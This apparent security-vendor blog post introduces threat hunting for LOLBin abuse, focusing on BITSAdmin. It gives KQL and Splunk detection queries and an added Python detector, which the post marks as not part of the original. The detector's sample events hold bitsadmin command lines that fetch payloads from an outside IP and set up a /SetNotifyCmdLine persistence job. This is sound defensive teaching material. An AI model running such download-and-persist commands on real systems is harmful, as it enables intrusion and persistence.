Threat Hunting: From LOLBins to Your Crown Jewels

What are LolBins?

“LolBins”, or Living off the Land Binaries, is a term used to describe the abuse of legitimate operating system binaries (hence the “Bin” in “LolBins”) to execute malicious code. Attackers use LolBins to bypass security controls designed to detect and block known malicious files, because these binaries are already present on the system, are signed by the OS vendor, and are often whitelisted by security software.

Essentially, attackers use existing system tools, such as PowerShell, Windows Management Instrumentation (WMI), or the Command Prompt, to run their own malicious code. These tools are commonly used by legitimate system administrators for routine tasks, so they are not typically flagged by security software or blocked by firewalls.

LolBins attacks can be difficult to detect because they use legitimate system processes and are often executed using tools that are considered trusted by default. As a result, they have become an increasingly popular tactic for attackers looking to evade detection and gain persistent access to a compromised system.

Here are some examples of malware families that abuse legitimate system binaries, known as LolBins, to execute malicious code:

  • The Chaes Malware targets customers of an e-commerce platform and abuses system binaries such as msiexec, wscript, and installutil.
  • The Egregor Ransomware is a variant of ransomware that has been identified in various sophisticated attacks on organizations worldwide. It uses rundll32 and bitsadmin to carry out its malicious activities.
  • The Astaroth Malware is an information stealer that was mainly active in Brazil and abuses regsvr32, wmic, and bitsadmin to steal sensitive data.
  • The Ramnit Trojan uses bitsadmin, certutil, and wscript to execute its malicious code in campaigns targeting the UK and Italy. It is often paired with another malware variant called sLoad.

These malware examples highlight the importance of understanding LolBins attacks and implementing security measures to prevent them. The LOLBAS Project on GitHub provides a useful resource for understanding how legitimate system binaries can be exploited for malicious activities.

As a threat hunter, it’s important to understand how legitimate system binaries can be abused for malicious purposes and to focus on trending binaries to detect anomalies in their usage. For example, let’s consider the BITSAdmin tool. A search on Google reveals that BITSAdmin is a command-line tool used to create download or upload jobs and monitor their progress.

To understand how attackers abuse BITSadmin, we can refer to the BITSadmin page on the LOLBAS Project, which lists common abuses of this tool, such as downloading files from external sources, executing files, and copying and adding data to Alternate Data Streams (ADS). We can also research real-life examples of BITSadmin abuse by reading blog posts and articles about it.

By examining these sources, we can learn about the command-line syntax used in real attacks, the process tree behavior associated with malicious usage of BITSadmin, and other suspicious file events. We can then use this information to create hunting queries that will help us detect anomalies in BITSadmin usage and identify potential threats.

Some examples of blog posts that describe real-life abuses of BITSadmin can help us better understand how this tool is being used in attacks.

  • Based on this tweet, it appears that BITSadmin is being used to copy and move files. Attackers may take advantage of this functionality to move files around a compromised system or to steal sensitive data.
  • This statement suggests that in a particular Astaroth attack, the attackers utilized BITSadmin to download multiple binary blobs from a command-and-control (C2) server. This is an example of how legitimate system binaries can be used for malicious purposes, and it highlights the importance of understanding how these tools can be exploited by attackers.
  • By analyzing the sandbox reports provided by VirusTotal, we can gain a better understanding of the related chains of executions used in a particular malware sample. In the case of the Astaroth sample, the reports may reveal the usage of CMD, wscript.exe, and BITSadmin, which are commonly exploited by attackers to execute malicious code on a compromised system.

By examining the examples of LolBins abuse provided earlier, we can identify potential behavioral patterns that can be used to create hunting queries to detect malicious activity in our network. One approach is to focus on identifying executions of the tool in our network and excluding all legitimate instances. We can achieve this by looking for patterns in legitimate command lines, parent processes, machine names, usernames, timestamps, and other relevant factors. It’s important to be specific in our search to avoid missing any malicious instances.

We can also expand our search to include the timeframe of the attack and look for other Tactics, Techniques, and Procedures (TTPs) that occurred before and after the specific time of the attack phase. This can help us identify other potential indicators of compromise that may be related to the attack or provide additional context.

In cases where there are too many different instances of execution to exclude everything, we can start adding filters and looking for patterns. The most useful filters to consider are the command line and process tree (parent or child). By identifying common patterns in these areas, we can develop more effective hunting queries that are better tailored to our specific environment and more likely to detect malicious activity.

Below are some example queries for hunting BITSAdmin activity, written for Microsoft 365 Defender (KQL) and Splunk (SPL). Each query matches on the original file name from the PE version information rather than the on-disk file name, so a renamed copy of bitsadmin.exe is still caught.

  • BITSAdmin download activity (using 365 Defender)
    DeviceProcessEvents
    | where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
    | where ProcessCommandLine contains "/addfile"
  • BITSAdmin download activity (using Splunk)
    | tstats summariesonly=false allow_old_summaries=true count, min(_time) AS firstTime, max(_time) AS lastTime FROM datamodel=Endpoint.Processes WHERE (("Processes.process_name"=bitsadmin.exe OR "Processes.original_file_name"=bitsadmin.exe) "Processes.process"=*transfer*) BY "Processes.dest", "Processes.user", "Processes.parent_process", "Processes.original_file_name", "Processes.process_name", "Processes.process", "Processes.process_id", "Processes.parent_process_id"
    | rename "Processes.*" AS "*"
    | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(firstTime)
    | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(lastTime)
  • BITSAdmin persistent job creation (using 365 Defender)
    DeviceProcessEvents
    | where ProcessVersionInfoOriginalFileName == "bitsadmin.exe"
    | where ProcessCommandLine contains "/SetNotifyCmdLine"
  • BITSAdmin persistent job creation (using Splunk)
    | tstats summariesonly=false allow_old_summaries=true count, min(_time) AS firstTime, max(_time) AS lastTime FROM datamodel=Endpoint.Processes WHERE (("Processes.process_name"=bitsadmin.exe OR "Processes.original_file_name"=bitsadmin.exe) ("Processes.process"=*create* OR "Processes.process"=*addfile* OR "Processes.process"=*setnotifyflags* OR "Processes.process"=*setnotifycmdline* OR "Processes.process"=*setminretrydelay* OR "Processes.process"=*setcustomheaders* OR "Processes.process"=*resume*)) BY "Processes.dest", "Processes.user", "Processes.original_file_name", "Processes.parent_process", "Processes.process_name", "Processes.process", "Processes.process_id", "Processes.parent_process_id"
    | rename "Processes.*" AS "*"
    | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(firstTime)
    | convert timeformat="%Y-%m-%dT%H:%M:%S" ctime(lastTime)
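To show the same two hunts (download via /transfer or /addfile, persistence via /SetNotifyCmdLine) together with the "exclude the legitimate instances" step described above, here is an added Python example that is not part of the original post; the sample events, the wsus.corp.example host and the (ccmexec.exe, svc_patch) baseline pair are constructed assumptions.

```python
import re

# Constructed sample process events using Defender-style field names (not real telemetry).
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "AccountName": "svc_patch", "InitiatingProcessFileName": "ccmexec.exe",
     "FileName": "bitsadmin.exe", "ProcessVersionInfoOriginalFileName": "bitsadmin.exe",
     "ProcessCommandLine": "bitsadmin /transfer patch /download http://wsus.corp.example/kb.msu C:\\Temp\\kb.msu"},
    {"DeviceName": "ws02", "AccountName": "jdoe", "InitiatingProcessFileName": "wscript.exe",
     "FileName": "bitsadmin.exe", "ProcessVersionInfoOriginalFileName": "bitsadmin.exe",
     "ProcessCommandLine": "bitsadmin /transfer job1 /download http://203.0.113.10/p.dat C:\\Users\\Public\\p.dat"},
    {"DeviceName": "ws02", "AccountName": "jdoe", "InitiatingProcessFileName": "cmd.exe",
     "FileName": "bitsadmin.exe", "ProcessVersionInfoOriginalFileName": "bitsadmin.exe",
     "ProcessCommandLine": "bitsadmin /SetNotifyCmdLine job1 C:\\Users\\Public\\p.dat NULL"},
    {"DeviceName": "ws03", "AccountName": "jdoe", "InitiatingProcessFileName": "cmd.exe",
     "FileName": "bitsadmin.exe", "ProcessVersionInfoOriginalFileName": "bitsadmin.exe",
     "ProcessCommandLine": "bitsadmin /list /allusers"},
    {"DeviceName": "ws04", "AccountName": "jdoe", "InitiatingProcessFileName": "cmd.exe",
     "FileName": "svchost.exe", "ProcessVersionInfoOriginalFileName": "bitsadmin.exe",
     "ProcessCommandLine": "svchost.exe /addfile job2 http://203.0.113.10/b.dat C:\\Users\\Public\\b.dat"},
]

# Switches the two hunting queries above key on: download vs. persistent-job creation.
DOWNLOAD_SWITCHES = re.compile(r"/(transfer|addfile)\b", re.IGNORECASE)
PERSIST_SWITCHES = re.compile(r"/setnotifycmdline\b", re.IGNORECASE)

# Known-good (parent process, account) pairs learned from the environment; hypothetical values.
BASELINE = {("ccmexec.exe", "svc_patch")}


def classify(event):
    # Match on the PE original file name so a renamed copy of bitsadmin.exe is still caught.
    if event.get("ProcessVersionInfoOriginalFileName", "").lower() != "bitsadmin.exe":
        return None
    cmd = event.get("ProcessCommandLine", "")
    if PERSIST_SWITCHES.search(cmd):
        return "persistence"
    if DOWNLOAD_SWITCHES.search(cmd):
        return "download"
    return None


def hunt(events, baseline=BASELINE):
    # Flag suspicious BITSAdmin events, dropping instances that match the legitimate baseline.
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict is None:
            continue
        if (ev["InitiatingProcessFileName"].lower(), ev["AccountName"].lower()) in baseline:
            continue  # legitimate instance excluded, as the post recommends
        hits.append((ev["DeviceName"], ev["FileName"], verdict, ev["ProcessCommandLine"]))
    return hits
```

Running `hunt(SAMPLE_EVENTS)` returns three hits: the wscript-spawned download, the /SetNotifyCmdLine persistence step, and the renamed binary on ws04; the patch job on ws01 is dropped by the baseline and the plain /list invocation is never flagged.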

In conclusion, threat hunting is a vast and ever-evolving field that can seem daunting to those new to it. However, the purpose of this blog is to provide an introduction to threat hunting and share some simple methods that you can use to get started.

There are many different approaches to threat hunting, including searches for Indicators of Compromise (IOCs) or Indicators of Behavior (IOBs). While IOCs are static artifacts such as file hashes, IP addresses, and domain names, IOBs refer to the set of behaviors associated with an attack, independent of tools or artifacts.

The goal of this blog is to encourage readers to explore the world of threat hunting and to provide a starting point for those new to the field. By developing an understanding of common attack techniques and tactics, and by leveraging various tools and techniques, threat hunters can proactively identify and mitigate threats to their organization.

You can watch our Founder talk about this topic on YouTube.
